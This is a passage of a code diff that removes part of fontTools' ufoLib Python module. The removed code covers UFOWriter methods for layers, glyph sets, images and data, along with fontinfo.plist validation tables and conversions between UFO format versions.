valid: - raise UFOLibError(message) - if libDict: - self._writePlist(LIB_FILENAME, libDict) - elif self._havePreviousFile: - self.removePath(LIB_FILENAME, force=True, removeEmptyParents=False) - - # features.fea - - def writeFeatures(self, features, validate=None): - """ - Write features.fea. This method requires a - features string as an argument. - """ - if validate is None: - validate = self._validate - if self._formatVersion == UFOFormatVersion.FORMAT_1_0: - raise UFOLibError("features.fea is not allowed in UFO Format Version 1.") - if validate: - if not isinstance(features, str): - raise UFOLibError("The features are not text.") - if features: - self.writeBytesToPath(FEATURES_FILENAME, features.encode("utf8")) - elif self._havePreviousFile: - self.removePath(FEATURES_FILENAME, force=True, removeEmptyParents=False) - - # glyph sets & layers - - def writeLayerContents(self, layerOrder=None, validate=None): - """ - Write the layercontents.plist file. This method *must* be called - after all glyph sets have been written. - """ - if validate is None: - validate = self._validate - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - return - if layerOrder is not None: - newOrder = [] - for layerName in layerOrder: - if layerName is None: - layerName = DEFAULT_LAYER_NAME - newOrder.append(layerName) - layerOrder = newOrder - else: - layerOrder = list(self.layerContents.keys()) - if validate and set(layerOrder) != set(self.layerContents.keys()): - raise UFOLibError( - "The layer order content does not match the glyph sets that have been created." - ) - layerContents = [ - (layerName, self.layerContents[layerName]) for layerName in layerOrder - ] - self._writePlist(LAYERCONTENTS_FILENAME, layerContents) - - def _findDirectoryForLayerName(self, layerName): - foundDirectory = None - for existingLayerName, directoryName in list(self.layerContents.items()): - if layerName is None and directoryName == DEFAULT_GLYPHS_DIRNAME: - foundDirectory = directoryName - break - elif existingLayerName == layerName: - foundDirectory = directoryName - break - if not foundDirectory: - raise UFOLibError( - "Could not locate a glyph set directory for the layer named %s." - % layerName - ) - return foundDirectory - - def getGlyphSet( - self, - layerName=None, - defaultLayer=True, - glyphNameToFileNameFunc=None, - validateRead=None, - validateWrite=None, - expectContentsFile=False, - ): - """ - Return the GlyphSet object associated with the - appropriate glyph directory in the .ufo. - If layerName is None, the default glyph set - will be used. The defaultLayer flag indictes - that the layer should be saved into the default - glyphs directory. - - ``validateRead`` will validate the read data, by default it is set to the - class's validate value, can be overridden. - ``validateWrte`` will validate the written data, by default it is set to the - class's validate value, can be overridden. - ``expectContentsFile`` will raise a GlifLibError if a contents.plist file is - not found on the glyph set file system. This should be set to ``True`` if you - are reading an existing UFO and ``False`` if you use ``getGlyphSet`` to create - a fresh glyph set. - """ - if validateRead is None: - validateRead = self._validate - if validateWrite is None: - validateWrite = self._validate - # only default can be written in < 3 - if self._formatVersion < UFOFormatVersion.FORMAT_3_0 and ( - not defaultLayer or layerName is not None - ): - raise UFOLibError( - f"Only the default layer can be writen in UFO {self._formatVersion.major}." - ) - # locate a layer name when None has been given - if layerName is None and defaultLayer: - for existingLayerName, directory in self.layerContents.items(): - if directory == DEFAULT_GLYPHS_DIRNAME: - layerName = existingLayerName - if layerName is None: - layerName = DEFAULT_LAYER_NAME - elif layerName is None and not defaultLayer: - raise UFOLibError("A layer name must be provided for non-default layers.") - # move along to format specific writing - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - return self._getDefaultGlyphSet( - validateRead, - validateWrite, - glyphNameToFileNameFunc=glyphNameToFileNameFunc, - expectContentsFile=expectContentsFile, - ) - elif self._formatVersion.major == UFOFormatVersion.FORMAT_3_0.major: - return self._getGlyphSetFormatVersion3( - validateRead, - validateWrite, - layerName=layerName, - defaultLayer=defaultLayer, - glyphNameToFileNameFunc=glyphNameToFileNameFunc, - expectContentsFile=expectContentsFile, - ) - else: - raise NotImplementedError(self._formatVersion) - - def _getDefaultGlyphSet( - self, - validateRead, - validateWrite, - glyphNameToFileNameFunc=None, - expectContentsFile=False, - ): - from fontTools.ufoLib.glifLib import GlyphSet - - glyphSubFS = self.fs.makedir(DEFAULT_GLYPHS_DIRNAME, recreate=True) - return GlyphSet( - glyphSubFS, - glyphNameToFileNameFunc=glyphNameToFileNameFunc, - ufoFormatVersion=self._formatVersion, - validateRead=validateRead, - validateWrite=validateWrite, - expectContentsFile=expectContentsFile, - ) - - def _getGlyphSetFormatVersion3( - self, - validateRead, - validateWrite, - layerName=None, - defaultLayer=True, - glyphNameToFileNameFunc=None, - expectContentsFile=False, - ): - from fontTools.ufoLib.glifLib import GlyphSet - - # if the default flag is on, make sure that the default in the file - # matches the default being written. also make sure that this layer - # name is not already linked to a non-default layer. - if defaultLayer: - for existingLayerName, directory in self.layerContents.items(): - if directory == DEFAULT_GLYPHS_DIRNAME: - if existingLayerName != layerName: - raise UFOLibError( - "Another layer ('%s') is already mapped to the default directory." - % existingLayerName - ) - elif existingLayerName == layerName: - raise UFOLibError( - "The layer name is already mapped to a non-default layer." - ) - # get an existing directory name - if layerName in self.layerContents: - directory = self.layerContents[layerName] - # get a new directory name - else: - if defaultLayer: - directory = DEFAULT_GLYPHS_DIRNAME - else: - # not caching this could be slightly expensive, - # but caching it will be cumbersome - existing = {d.lower() for d in self.layerContents.values()} - directory = userNameToFileName( - layerName, existing=existing, prefix="glyphs." - ) - # make the directory - glyphSubFS = self.fs.makedir(directory, recreate=True) - # store the mapping - self.layerContents[layerName] = directory - # load the glyph set - return GlyphSet( - glyphSubFS, - glyphNameToFileNameFunc=glyphNameToFileNameFunc, - ufoFormatVersion=self._formatVersion, - validateRead=validateRead, - validateWrite=validateWrite, - expectContentsFile=expectContentsFile, - ) - - def renameGlyphSet(self, layerName, newLayerName, defaultLayer=False): - """ - Rename a glyph set. - - Note: if a GlyphSet object has already been retrieved for - layerName, it is up to the caller to inform that object that - the directory it represents has changed. - """ - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - # ignore renaming glyph sets for UFO1 UFO2 - # just write the data from the default layer - return - # the new and old names can be the same - # as long as the default is being switched - if layerName == newLayerName: - # if the default is off and the layer is already not the default, skip - if ( - self.layerContents[layerName] != DEFAULT_GLYPHS_DIRNAME - and not defaultLayer - ): - return - # if the default is on and the layer is already the default, skip - if self.layerContents[layerName] == DEFAULT_GLYPHS_DIRNAME and defaultLayer: - return - else: - # make sure the new layer name doesn't already exist - if newLayerName is None: - newLayerName = DEFAULT_LAYER_NAME - if newLayerName in self.layerContents: - raise UFOLibError("A layer named %s already exists." % newLayerName) - # make sure the default layer doesn't already exist - if defaultLayer and DEFAULT_GLYPHS_DIRNAME in self.layerContents.values(): - raise UFOLibError("A default layer already exists.") - # get the paths - oldDirectory = self._findDirectoryForLayerName(layerName) - if defaultLayer: - newDirectory = DEFAULT_GLYPHS_DIRNAME - else: - existing = {name.lower() for name in self.layerContents.values()} - newDirectory = userNameToFileName( - newLayerName, existing=existing, prefix="glyphs." - ) - # update the internal mapping - del self.layerContents[layerName] - self.layerContents[newLayerName] = newDirectory - # do the file system copy - self.fs.movedir(oldDirectory, newDirectory, create=True) - - def deleteGlyphSet(self, layerName): - """ - Remove the glyph set matching layerName. - """ - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - # ignore deleting glyph sets for UFO1 UFO2 as there are no layers - # just write the data from the default layer - return - foundDirectory = self._findDirectoryForLayerName(layerName) - self.removePath(foundDirectory, removeEmptyParents=False) - del self.layerContents[layerName] - - def writeData(self, fileName, data): - """ - Write data to fileName in the 'data' directory. - The data must be a bytes string. - """ - self.writeBytesToPath(f"{DATA_DIRNAME}/{fsdecode(fileName)}", data) - - def removeData(self, fileName): - """ - Remove the file named fileName from the data directory. - """ - self.removePath(f"{DATA_DIRNAME}/{fsdecode(fileName)}") - - # /images - - def writeImage(self, fileName, data, validate=None): - """ - Write data to fileName in the images directory. - The data must be a valid PNG. - """ - if validate is None: - validate = self._validate - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - raise UFOLibError( - f"Images are not allowed in UFO {self._formatVersion.major}." - ) - fileName = fsdecode(fileName) - if validate: - valid, error = pngValidator(data=data) - if not valid: - raise UFOLibError(error) - self.writeBytesToPath(f"{IMAGES_DIRNAME}/{fileName}", data) - - def removeImage(self, fileName, validate=None): # XXX remove unused 'validate'? - """ - Remove the file named fileName from the - images directory. - """ - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - raise UFOLibError( - f"Images are not allowed in UFO {self._formatVersion.major}." - ) - self.removePath(f"{IMAGES_DIRNAME}/{fsdecode(fileName)}") - - def copyImageFromReader(self, reader, sourceFileName, destFileName, validate=None): - """ - Copy the sourceFileName in the provided UFOReader to destFileName - in this writer. This uses the most memory efficient method possible - for copying the data possible. - """ - if validate is None: - validate = self._validate - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - raise UFOLibError( - f"Images are not allowed in UFO {self._formatVersion.major}." - ) - sourcePath = f"{IMAGES_DIRNAME}/{fsdecode(sourceFileName)}" - destPath = f"{IMAGES_DIRNAME}/{fsdecode(destFileName)}" - self.copyFromReader(reader, sourcePath, destPath) - - def close(self): - if self._havePreviousFile and self._fileStructure is UFOFileStructure.ZIP: - # if we are updating an existing zip file, we can now compress the - # contents of the temporary filesystem in the destination path - rootDir = os.path.splitext(os.path.basename(self._path))[0] + ".ufo" - with fs.zipfs.ZipFS(self._path, write=True, encoding="utf-8") as destFS: - fs.copy.copy_fs(self.fs, destFS.makedir(rootDir)) - super().close() - - -# just an alias, makes it more explicit -UFOReaderWriter = UFOWriter - - -# ---------------- -# Helper Functions -# ---------------- - - -def _sniffFileStructure(ufo_path): - """Return UFOFileStructure.ZIP if the UFO at path 'ufo_path' (str) - is a zip file, else return UFOFileStructure.PACKAGE if 'ufo_path' is a - directory. - Raise UFOLibError if it is a file with unknown structure, or if the path - does not exist. - """ - if zipfile.is_zipfile(ufo_path): - return UFOFileStructure.ZIP - elif os.path.isdir(ufo_path): - return UFOFileStructure.PACKAGE - elif os.path.isfile(ufo_path): - raise UFOLibError( - "The specified UFO does not have a known structure: '%s'" % ufo_path - ) - else: - raise UFOLibError("No such file or directory: '%s'" % ufo_path) - - -def makeUFOPath(path): - """ - Return a .ufo pathname. - - >>> makeUFOPath("directory/something.ext") == ( - ... os.path.join('directory', 'something.ufo')) - True - >>> makeUFOPath("directory/something.another.thing.ext") == ( - ... os.path.join('directory', 'something.another.thing.ufo')) - True - """ - dir, name = os.path.split(path) - name = ".".join([".".join(name.split(".")[:-1]), "ufo"]) - return os.path.join(dir, name) - - -# ---------------------- -# fontinfo.plist Support -# ---------------------- - -# Version Validators - -# There is no version 1 validator and there shouldn't be. -# The version 1 spec was very loose and there were numerous -# cases of invalid values. - - -def validateFontInfoVersion2ValueForAttribute(attr, value): - """ - This performs very basic validation of the value for attribute - following the UFO 2 fontinfo.plist specification. The results - of this should not be interpretted as *correct* for the font - that they are part of. This merely indicates that the value - is of the proper type and, where the specification defines - a set range of possible values for an attribute, that the - value is in the accepted range. - """ - dataValidationDict = fontInfoAttributesVersion2ValueData[attr] - valueType = dataValidationDict.get("type") - validator = dataValidationDict.get("valueValidator") - valueOptions = dataValidationDict.get("valueOptions") - # have specific options for the validator - if valueOptions is not None: - isValidValue = validator(value, valueOptions) - # no specific options - else: - if validator == genericTypeValidator: - isValidValue = validator(value, valueType) - else: - isValidValue = validator(value) - return isValidValue - - -def validateInfoVersion2Data(infoData): - """ - This performs very basic validation of the value for infoData - following the UFO 2 fontinfo.plist specification. The results - of this should not be interpretted as *correct* for the font - that they are part of. This merely indicates that the values - are of the proper type and, where the specification defines - a set range of possible values for an attribute, that the - value is in the accepted range. - """ - validInfoData = {} - for attr, value in list(infoData.items()): - isValidValue = validateFontInfoVersion2ValueForAttribute(attr, value) - if not isValidValue: - raise UFOLibError(f"Invalid value for attribute {attr} ({value!r}).") - else: - validInfoData[attr] = value - return validInfoData - - -def validateFontInfoVersion3ValueForAttribute(attr, value): - """ - This performs very basic validation of the value for attribute - following the UFO 3 fontinfo.plist specification. The results - of this should not be interpretted as *correct* for the font - that they are part of. This merely indicates that the value - is of the proper type and, where the specification defines - a set range of possible values for an attribute, that the - value is in the accepted range. - """ - dataValidationDict = fontInfoAttributesVersion3ValueData[attr] - valueType = dataValidationDict.get("type") - validator = dataValidationDict.get("valueValidator") - valueOptions = dataValidationDict.get("valueOptions") - # have specific options for the validator - if valueOptions is not None: - isValidValue = validator(value, valueOptions) - # no specific options - else: - if validator == genericTypeValidator: - isValidValue = validator(value, valueType) - else: - isValidValue = validator(value) - return isValidValue - - -def validateInfoVersion3Data(infoData): - """ - This performs very basic validation of the value for infoData - following the UFO 3 fontinfo.plist specification. The results - of this should not be interpretted as *correct* for the font - that they are part of. This merely indicates that the values - are of the proper type and, where the specification defines - a set range of possible values for an attribute, that the - value is in the accepted range. - """ - validInfoData = {} - for attr, value in list(infoData.items()): - isValidValue = validateFontInfoVersion3ValueForAttribute(attr, value) - if not isValidValue: - raise UFOLibError(f"Invalid value for attribute {attr} ({value!r}).") - else: - validInfoData[attr] = value - return validInfoData - - -# Value Options - -fontInfoOpenTypeHeadFlagsOptions = list(range(0, 15)) -fontInfoOpenTypeOS2SelectionOptions = [1, 2, 3, 4, 7, 8, 9] -fontInfoOpenTypeOS2UnicodeRangesOptions = list(range(0, 128)) -fontInfoOpenTypeOS2CodePageRangesOptions = list(range(0, 64)) -fontInfoOpenTypeOS2TypeOptions = [0, 1, 2, 3, 8, 9] - -# Version Attribute Definitions -# This defines the attributes, types and, in some -# cases the possible values, that can exist is -# fontinfo.plist. - -fontInfoAttributesVersion1 = { - "familyName", - "styleName", - "fullName", - "fontName", - "menuName", - "fontStyle", - "note", - "versionMajor", - "versionMinor", - "year", - "copyright", - "notice", - "trademark", - "license", - "licenseURL", - "createdBy", - "designer", - "designerURL", - "vendorURL", - "unitsPerEm", - "ascender", - "descender", - "capHeight", - "xHeight", - "defaultWidth", - "slantAngle", - "italicAngle", - "widthName", - "weightName", - "weightValue", - "fondName", - "otFamilyName", - "otStyleName", - "otMacName", - "msCharSet", - "fondID", - "uniqueID", - "ttVendor", - "ttUniqueID", - "ttVersion", -} - -fontInfoAttributesVersion2ValueData = { - "familyName": dict(type=str), - "styleName": dict(type=str), - "styleMapFamilyName": dict(type=str), - "styleMapStyleName": dict( - type=str, valueValidator=fontInfoStyleMapStyleNameValidator - ), - "versionMajor": dict(type=int), - "versionMinor": dict(type=int), - "year": dict(type=int), - "copyright": dict(type=str), - "trademark": dict(type=str), - "unitsPerEm": dict(type=(int, float)), - "descender": dict(type=(int, float)), - "xHeight": dict(type=(int, float)), - "capHeight": dict(type=(int, float)), - "ascender": dict(type=(int, float)), - "italicAngle": dict(type=(float, int)), - "note": dict(type=str), - "openTypeHeadCreated": dict( - type=str, valueValidator=fontInfoOpenTypeHeadCreatedValidator - ), - "openTypeHeadLowestRecPPEM": dict(type=(int, float)), - "openTypeHeadFlags": dict( - type="integerList", - valueValidator=genericIntListValidator, - valueOptions=fontInfoOpenTypeHeadFlagsOptions, - ), - "openTypeHheaAscender": dict(type=(int, float)), - "openTypeHheaDescender": dict(type=(int, float)), - "openTypeHheaLineGap": dict(type=(int, float)), - "openTypeHheaCaretSlopeRise": dict(type=int), - "openTypeHheaCaretSlopeRun": dict(type=int), - "openTypeHheaCaretOffset": dict(type=(int, float)), - "openTypeNameDesigner": dict(type=str), - "openTypeNameDesignerURL": dict(type=str), - "openTypeNameManufacturer": dict(type=str), - "openTypeNameManufacturerURL": dict(type=str), - "openTypeNameLicense": dict(type=str), - "openTypeNameLicenseURL": dict(type=str), - "openTypeNameVersion": dict(type=str), - "openTypeNameUniqueID": dict(type=str), - "openTypeNameDescription": dict(type=str), - "openTypeNamePreferredFamilyName": dict(type=str), - "openTypeNamePreferredSubfamilyName": dict(type=str), - "openTypeNameCompatibleFullName": dict(type=str), - "openTypeNameSampleText": dict(type=str), - "openTypeNameWWSFamilyName": dict(type=str), - "openTypeNameWWSSubfamilyName": dict(type=str), - "openTypeOS2WidthClass": dict( - type=int, valueValidator=fontInfoOpenTypeOS2WidthClassValidator - ), - "openTypeOS2WeightClass": dict( - type=int, valueValidator=fontInfoOpenTypeOS2WeightClassValidator - ), - "openTypeOS2Selection": dict( - type="integerList", - valueValidator=genericIntListValidator, - valueOptions=fontInfoOpenTypeOS2SelectionOptions, - ), - "openTypeOS2VendorID": dict(type=str), - "openTypeOS2Panose": dict( - type="integerList", valueValidator=fontInfoVersion2OpenTypeOS2PanoseValidator - ), - "openTypeOS2FamilyClass": dict( - type="integerList", valueValidator=fontInfoOpenTypeOS2FamilyClassValidator - ), - "openTypeOS2UnicodeRanges": dict( - type="integerList", - valueValidator=genericIntListValidator, - valueOptions=fontInfoOpenTypeOS2UnicodeRangesOptions, - ), - "openTypeOS2CodePageRanges": dict( - type="integerList", - valueValidator=genericIntListValidator, - valueOptions=fontInfoOpenTypeOS2CodePageRangesOptions, - ), - "openTypeOS2TypoAscender": dict(type=(int, float)), - "openTypeOS2TypoDescender": dict(type=(int, float)), - "openTypeOS2TypoLineGap": dict(type=(int, float)), - "openTypeOS2WinAscent": dict(type=(int, float)), - "openTypeOS2WinDescent": dict(type=(int, float)), - "openTypeOS2Type": dict( - type="integerList", - valueValidator=genericIntListValidator, - valueOptions=fontInfoOpenTypeOS2TypeOptions, - ), - "openTypeOS2SubscriptXSize": dict(type=(int, float)), - "openTypeOS2SubscriptYSize": dict(type=(int, float)), - "openTypeOS2SubscriptXOffset": dict(type=(int, float)), - "openTypeOS2SubscriptYOffset": dict(type=(int, float)), - "openTypeOS2SuperscriptXSize": dict(type=(int, float)), - "openTypeOS2SuperscriptYSize": dict(type=(int, float)), - "openTypeOS2SuperscriptXOffset": dict(type=(int, float)), - "openTypeOS2SuperscriptYOffset": dict(type=(int, float)), - "openTypeOS2StrikeoutSize": dict(type=(int, float)), - "openTypeOS2StrikeoutPosition": dict(type=(int, float)), - "openTypeVheaVertTypoAscender": dict(type=(int, float)), - "openTypeVheaVertTypoDescender": dict(type=(int, float)), - "openTypeVheaVertTypoLineGap": dict(type=(int, float)), - "openTypeVheaCaretSlopeRise": dict(type=int), - "openTypeVheaCaretSlopeRun": dict(type=int), - "openTypeVheaCaretOffset": dict(type=(int, float)), - "postscriptFontName": dict(type=str), - "postscriptFullName": dict(type=str), - "postscriptSlantAngle": dict(type=(float, int)), - "postscriptUniqueID": dict(type=int), - "postscriptUnderlineThickness": dict(type=(int, float)), - "postscriptUnderlinePosition": dict(type=(int, float)), - "postscriptIsFixedPitch": dict(type=bool), - "postscriptBlueValues": dict( - type="integerList", valueValidator=fontInfoPostscriptBluesValidator - ), - "postscriptOtherBlues": dict( - type="integerList", valueValidator=fontInfoPostscriptOtherBluesValidator - ), - "postscriptFamilyBlues": dict( - type="integerList", valueValidator=fontInfoPostscriptBluesValidator - ), - "postscriptFamilyOtherBlues": dict( - type="integerList", valueValidator=fontInfoPostscriptOtherBluesValidator - ), - "postscriptStemSnapH": dict( - type="integerList", valueValidator=fontInfoPostscriptStemsValidator - ), - "postscriptStemSnapV": dict( - type="integerList", valueValidator=fontInfoPostscriptStemsValidator - ), - "postscriptBlueFuzz": dict(type=(int, float)), - "postscriptBlueShift": dict(type=(int, float)), - "postscriptBlueScale": dict(type=(float, int)), - "postscriptForceBold": dict(type=bool), - "postscriptDefaultWidthX": dict(type=(int, float)), - "postscriptNominalWidthX": dict(type=(int, float)), - "postscriptWeightName": dict(type=str), - "postscriptDefaultCharacter": dict(type=str), - "postscriptWindowsCharacterSet": dict( - type=int, valueValidator=fontInfoPostscriptWindowsCharacterSetValidator - ), - "macintoshFONDFamilyID": dict(type=int), - "macintoshFONDName": dict(type=str), -} -fontInfoAttributesVersion2 = set(fontInfoAttributesVersion2ValueData.keys()) - -fontInfoAttributesVersion3ValueData = deepcopy(fontInfoAttributesVersion2ValueData) -fontInfoAttributesVersion3ValueData.update( - { - "versionMinor": dict(type=int, valueValidator=genericNonNegativeIntValidator), - "unitsPerEm": dict( - type=(int, float), valueValidator=genericNonNegativeNumberValidator - ), - "openTypeHeadLowestRecPPEM": dict( - type=int, valueValidator=genericNonNegativeNumberValidator - ), - "openTypeHheaAscender": dict(type=int), - "openTypeHheaDescender": dict(type=int), - "openTypeHheaLineGap": dict(type=int), - "openTypeHheaCaretOffset": dict(type=int), - "openTypeOS2Panose": dict( - type="integerList", - valueValidator=fontInfoVersion3OpenTypeOS2PanoseValidator, - ), - "openTypeOS2TypoAscender": dict(type=int), - "openTypeOS2TypoDescender": dict(type=int), - "openTypeOS2TypoLineGap": dict(type=int), - "openTypeOS2WinAscent": dict( - type=int, valueValidator=genericNonNegativeNumberValidator - ), - "openTypeOS2WinDescent": dict( - type=int, valueValidator=genericNonNegativeNumberValidator - ), - "openTypeOS2SubscriptXSize": dict(type=int), - "openTypeOS2SubscriptYSize": dict(type=int), - "openTypeOS2SubscriptXOffset": dict(type=int), - "openTypeOS2SubscriptYOffset": dict(type=int), - "openTypeOS2SuperscriptXSize": dict(type=int), - "openTypeOS2SuperscriptYSize": dict(type=int), - "openTypeOS2SuperscriptXOffset": dict(type=int), - "openTypeOS2SuperscriptYOffset": dict(type=int), - "openTypeOS2StrikeoutSize": dict(type=int), - "openTypeOS2StrikeoutPosition": dict(type=int), - "openTypeGaspRangeRecords": dict( - type="dictList", valueValidator=fontInfoOpenTypeGaspRangeRecordsValidator - ), - "openTypeNameRecords": dict( - type="dictList", valueValidator=fontInfoOpenTypeNameRecordsValidator - ), - "openTypeVheaVertTypoAscender": dict(type=int), - "openTypeVheaVertTypoDescender": dict(type=int), - "openTypeVheaVertTypoLineGap": dict(type=int), - "openTypeVheaCaretOffset": dict(type=int), - "woffMajorVersion": dict( - type=int, valueValidator=genericNonNegativeIntValidator - ), - "woffMinorVersion": dict( - type=int, valueValidator=genericNonNegativeIntValidator - ), - "woffMetadataUniqueID": dict( - type=dict, valueValidator=fontInfoWOFFMetadataUniqueIDValidator - ), - "woffMetadataVendor": dict( - type=dict, valueValidator=fontInfoWOFFMetadataVendorValidator - ), - "woffMetadataCredits": dict( - type=dict, valueValidator=fontInfoWOFFMetadataCreditsValidator - ), - "woffMetadataDescription": dict( - type=dict, valueValidator=fontInfoWOFFMetadataDescriptionValidator - ), - "woffMetadataLicense": dict( - type=dict, valueValidator=fontInfoWOFFMetadataLicenseValidator - ), - "woffMetadataCopyright": dict( - type=dict, valueValidator=fontInfoWOFFMetadataCopyrightValidator - ), - "woffMetadataTrademark": dict( - type=dict, valueValidator=fontInfoWOFFMetadataTrademarkValidator - ), - "woffMetadataLicensee": dict( - type=dict, valueValidator=fontInfoWOFFMetadataLicenseeValidator - ), - "woffMetadataExtensions": dict( - type=list, valueValidator=fontInfoWOFFMetadataExtensionsValidator - ), - "guidelines": dict(type=list, valueValidator=guidelinesValidator), - } -) -fontInfoAttributesVersion3 = set(fontInfoAttributesVersion3ValueData.keys()) - -# insert the type validator for all attrs that -# have no defined validator. -for attr, dataDict in list(fontInfoAttributesVersion2ValueData.items()): - if "valueValidator" not in dataDict: - dataDict["valueValidator"] = genericTypeValidator - -for attr, dataDict in list(fontInfoAttributesVersion3ValueData.items()): - if "valueValidator" not in dataDict: - dataDict["valueValidator"] = genericTypeValidator - -# Version Conversion Support -# These are used from converting from version 1 -# to version 2 or vice-versa. - - -def _flipDict(d): - flipped = {} - for key, value in list(d.items()): - flipped[value] = key - return flipped - - -fontInfoAttributesVersion1To2 = { - "menuName": "styleMapFamilyName", - "designer": "openTypeNameDesigner", - "designerURL": "openTypeNameDesignerURL", - "createdBy": "openTypeNameManufacturer", - "vendorURL": "openTypeNameManufacturerURL", - "license": "openTypeNameLicense", - "licenseURL": "openTypeNameLicenseURL", - "ttVersion": "openTypeNameVersion", - "ttUniqueID": "openTypeNameUniqueID", - "notice": "openTypeNameDescription", - "otFamilyName": "openTypeNamePreferredFamilyName", - "otStyleName": "openTypeNamePreferredSubfamilyName", - "otMacName": "openTypeNameCompatibleFullName", - "weightName": "postscriptWeightName", - "weightValue": "openTypeOS2WeightClass", - "ttVendor": "openTypeOS2VendorID", - "uniqueID": "postscriptUniqueID", - "fontName": "postscriptFontName", - "fondID": "macintoshFONDFamilyID", - "fondName": "macintoshFONDName", - "defaultWidth": "postscriptDefaultWidthX", - "slantAngle": "postscriptSlantAngle", - "fullName": "postscriptFullName", - # require special value conversion - "fontStyle": "styleMapStyleName", - "widthName": "openTypeOS2WidthClass", - "msCharSet": "postscriptWindowsCharacterSet", -} -fontInfoAttributesVersion2To1 = _flipDict(fontInfoAttributesVersion1To2) -deprecatedFontInfoAttributesVersion2 = set(fontInfoAttributesVersion1To2.keys()) - -_fontStyle1To2 = {64: "regular", 1: "italic", 32: "bold", 33: "bold italic"} -_fontStyle2To1 = _flipDict(_fontStyle1To2) -# Some UFO 1 files have 0 -_fontStyle1To2[0] = "regular" - -_widthName1To2 = { - "Ultra-condensed": 1, - "Extra-condensed": 2, - "Condensed": 3, - "Semi-condensed": 4, - "Medium (normal)": 5, - "Semi-expanded": 6, - "Expanded": 7, - "Extra-expanded": 8, - "Ultra-expanded": 9, -} -_widthName2To1 = _flipDict(_widthName1To2) -# FontLab's default width value is "Normal". -# Many format version 1 UFOs will have this. -_widthName1To2["Normal"] = 5 -# FontLab has an "All" width value. In UFO 1 -# move this up to "Normal". -_widthName1To2["All"] = 5 -# "medium" appears in a lot of UFO 1 files. -_widthName1To2["medium"] = 5 -# "Medium" appears in a lot of UFO 1 files. -_widthName1To2["Medium"] = 5 - -_msCharSet1To2 = { - 0: 1, - 1: 2, - 2: 3, - 77: 4, - 128: 5, - 129: 6, - 130: 7, - 134: 8, - 136: 9, - 161: 10, - 162: 11, - 163: 12, - 177: 13, - 178: 14, - 186: 15, - 200: 16, - 204: 17, - 222: 18, - 238: 19, - 255: 20, -} -_msCharSet2To1 = _flipDict(_msCharSet1To2) - -# 1 <-> 2 - - -def convertFontInfoValueForAttributeFromVersion1ToVersion2(attr, value): - """ - Convert value from version 1 to version 2 format. - Returns the new attribute name and the converted value. - If the value is None, None will be returned for the new value. - """ - # convert floats to ints if possible - if isinstance(value, float): - if int(value) == value: - value = int(value) - if value is not None: - if attr == "fontStyle": - v = _fontStyle1To2.get(value) - if v is None: - raise UFOLibError( - f"Cannot convert value ({value!r}) for attribute {attr}." - ) - value = v - elif attr == "widthName": - v = _widthName1To2.get(value) - if v is None: - raise UFOLibError( - f"Cannot convert value ({value!r}) for attribute {attr}." - ) - value = v - elif attr == "msCharSet": - v = _msCharSet1To2.get(value) - if v is None: - raise UFOLibError( - f"Cannot convert value ({value!r}) for attribute {attr}." - ) - value = v - attr = fontInfoAttributesVersion1To2.get(attr, attr) - return attr, value - - -def convertFontInfoValueForAttributeFromVersion2ToVersion1(attr, value): - """ - Convert value from version 2 to version 1 format. - Returns the new attribute name and the converted value. - If the value is None, None will be returned for the new value. - """ - if value is not None: - if attr == "styleMapStyleName": - value = _fontStyle2To1.get(value) - elif attr == "openTypeOS2WidthClass": - value = _widthName2To1.get(value) - elif attr == "postscriptWindowsCharacterSet": - value = _msCharSet2To1.get(value) - attr = fontInfoAttributesVersion2To1.get(attr, attr) - return attr, value - - -def _convertFontInfoDataVersion1ToVersion2(data): - converted = {} - for attr, value in list(data.items()): - # FontLab gives -1 for the weightValue - # for fonts wil no defined value. Many - # format version 1 UFOs will have this. - if attr == "weightValue" and value == -1: - continue - newAttr, newValue = convertFontInfoValueForAttributeFromVersion1ToVersion2( - attr, value - ) - # skip if the attribute is not part of version 2 - if newAttr not in fontInfoAttributesVersion2: - continue - # catch values that can't be converted - if value is None: - raise UFOLibError( - f"Cannot convert value ({value!r}) for attribute {newAttr}." - ) - # store - converted[newAttr] = newValue - return converted - - -def _convertFontInfoDataVersion2ToVersion1(data): - converted = {} - for attr, value in list(data.items()): - newAttr, newValue = convertFontInfoValueForAttributeFromVersion2ToVersion1( - attr, value - ) - # only take attributes that are registered for version 1 - if newAttr not in fontInfoAttributesVersion1: - continue - # catch values that can't be converted - if value is None: - raise UFOLibError( - f"Cannot convert value ({value!r}) for attribute {newAttr}." - ) - # store - converted[newAttr] = newValue - return converted - - -# 2 <-> 3 - -_ufo2To3NonNegativeInt = { - "versionMinor", - "openTypeHeadLowestRecPPEM", - "openTypeOS2WinAscent", - "openTypeOS2WinDescent", -} -_ufo2To3NonNegativeIntOrFloat = { - "unitsPerEm", -} -_ufo2To3FloatToInt = { - "openTypeHeadLowestRecPPEM", - "openTypeHheaAscender", - "openTypeHheaDescender", - "openTypeHheaLineGap", - "openTypeHheaCaretOffset", - "openTypeOS2TypoAscender", - "openTypeOS2TypoDescender", - "openTypeOS2TypoLineGap", - "openTypeOS2WinAscent", - "openTypeOS2WinDescent", - "openTypeOS2SubscriptXSize", - "openTypeOS2SubscriptYSize", - "openTypeOS2SubscriptXOffset", - "openTypeOS2SubscriptYOffset", - "openTypeOS2SuperscriptXSize", - "openTypeOS2SuperscriptYSize", - "openTypeOS2SuperscriptXOffset", - "openTypeOS2SuperscriptYOffset", - "openTypeOS2StrikeoutSize", - "openTypeOS2StrikeoutPosition", - "openTypeVheaVertTypoAscender", - "openTypeVheaVertTypoDescender", - "openTypeVheaVertTypoLineGap", - "openTypeVheaCaretOffset", -} - - -def convertFontInfoValueForAttributeFromVersion2ToVersion3(attr, value): - """ - Convert value from version 2 to version 3 format. - Returns the new attribute name and the converted value. - If the value is None, None will be returned for the new value. - """ - if attr in _ufo2To3FloatToInt: - try: - value = round(value) - except (ValueError, TypeError): - raise UFOLibError("Could not convert value for %s." % attr) - if attr in _ufo2To3NonNegativeInt: - try: - value = int(abs(value)) - except (ValueError, TypeError): - raise UFOLibError("Could not convert value for %s." % attr) - elif attr in _ufo2To3NonNegativeIntOrFloat: - try: - v = float(abs(value)) - except (ValueError, TypeError): - raise UFOLibError("Could not convert value for %s." % attr) - if v == int(v): - v = int(v) - if v != value: - value = v - return attr, value - - -def convertFontInfoValueForAttributeFromVersion3ToVersion2(attr, value): 